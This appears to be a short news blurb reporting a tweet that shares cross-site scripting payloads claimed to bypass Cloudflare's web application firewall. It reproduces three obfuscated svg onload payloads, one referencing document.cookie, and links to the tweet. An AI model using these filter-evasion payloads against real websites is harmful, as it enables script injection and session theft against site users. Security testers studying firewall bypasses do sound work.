BugHuntingTips tweeted about top XSS WAF bypass payloads for CloudFlare WAF. Payloads include various XSS vectors such as <svg onload=alert&#0000000040document.cookie)>, <svg/oNLY%3d1/**/On+ONLoaD%3dco\u006efirm%26\#x28%3b%26\#x29%3b>, and <Svg Only=1 OnLoad=confirm(atob("Q2xvdWRmbGFyZSBCeXBhc3NLZCA6KQ=="))>. These payloads can potentially bypass CloudFlare WAF's XSS protections.
For more details, check out the original tweet here: https://twitter.com/0xRAYAN7/status/1793216918238679062
Subscribe for the latest news: